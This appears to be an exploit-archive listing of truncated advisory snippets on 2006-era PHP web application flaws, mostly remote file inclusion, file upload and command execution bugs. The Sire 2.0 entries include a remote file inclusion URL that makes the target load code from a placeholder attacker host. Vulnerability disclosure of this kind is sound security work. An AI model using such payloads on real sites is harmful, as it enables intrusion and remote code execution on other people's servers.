SimpleBBS 1.0.6/1.0.7/1.1 - Arbitrary Command Execution
SimpleBBS 1.0.6/1.0.7/1.1 - Arbitrary Command Execution source: https://www.securityfocus.com/bid/17501/info SimpleBBS is prone to an arbitrary command-execution vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this...
AzDGVote - Remote File Inclusion
source: https://www.securityfocus.com/bid/17447/info AzDGVote is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious PH...
Indexu 5.0 - Multiple Remote File Inclusions
Indexu 5.0 - Multiple Remote File Inclusions source: https://www.securityfocus.com/bid/17470/info The 'indexu' application is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can explo...
AzDGVote - Remote File Inclusion
AzDGVote - Remote File Inclusion source: https://www.securityfocus.com/bid/17447/info AzDGVote is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary...
SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17423/info SPIP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP co...
SIRE 2.0 - Arbitrary File Upload
source: https://www.securityfocus.com/bid/17431/info SIRE is prone to an arbitrary file-upload vulnerability. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation...
SPIP 1.8.3 - Spip_login.php Remote File Inclusion
SPIP 1.8.3 - Spip_login.php Remote File Inclusion source: https://www.securityfocus.com/bid/17423/info SPIP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an...
XSS Bug in Cherokee Webserver
On Tuesday, 4 April 2006, I detected that it is possible to mount a Cross-Site Scripting (XSS) attack in cherokee-0.5.0 and all previous versions. The problem arises when HTML code is introduced in the URL. Because previously, it was let now of a seemed failure, from version 0.4...
Sire 2.0 - lire.php Remote File Inclusion / Arbitrary File Upload
Sire 2.0 - lire.php Remote File Inclusion / Arbitrary File Upload +File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified before it is used to include remote files. Successful exploitation requires that "register_globals" is enabled. lire.php code +Exploit: Exploit...
Sire 2.0 - '/lire.php' Remote File Inclusion / Arbitrary File Upload
+File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified before it is used to include remote files. Successful exploitation requires that "register_globals" is enabled. lire.php code +Exploit: Exploit http://trajet/lire.php?rub=http://attacker&cahier=1&art=1...
Warcraft III Replay Parser for PHP 1.8.c - 'index.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17334/info Warcraft III Replay Parser for PHP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote fi...
Warcraft III Replay Parser for PHP 1.8.c - index.php Remote File Inclusion
Warcraft III Replay Parser for PHP 1.8.c - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/17334/info Warcraft III Replay Parser for PHP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied...
MediaSlash Gallery - index.php Remote File Inclusion
MediaSlash Gallery - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/17323/info MediaSlash Gallery is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this...
MediaSlash Gallery - 'index.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17323/info MediaSlash Gallery is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...
VihorDesign - index.php Remote File Inclusion
VihorDesign - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/17227/info VihorDesign is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include...
VihorDesign - 'index.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/17227/info VihorDesign is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious...
Core News 2.0.1 - index.php Remote Code Execution
Core News 2.0.1 - index.php Remote Code Execution source: https://www.securityfocus.com/bid/17067/info Core News is prone to a code-execution vulnerability. An attacker can exploit this issue to execute arbitrary malicious PHP code and execute it in the context of the webserver process. This may...
Core News 2.0.1 - 'index.php' Remote Code Execution
source: https://www.securityfocus.com/bid/17067/info Core News is prone to a code-execution vulnerability. An attacker can exploit this issue to execute arbitrary malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the...
LoudBlog 0.41 - 'index.php?template' Traversal Arbitrary File Access
source: https://www.securityfocus.com/bid/17023/info Loudblog is prone to multiple input-validation vulnerabilities: - An SQL-injection vulnerability. - Two local file-include vulnerabilities. - An information-disclosure vulnerability. These issues allow remote attackers to execute arbitrary PHP...
PHORUM 3.x/5.x - Common.php Remote File Inclusion
PHORUM 3.x/5.x - Common.php Remote File Inclusion source: https://www.securityfocus.com/bid/16977/info The PHORUM application is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this...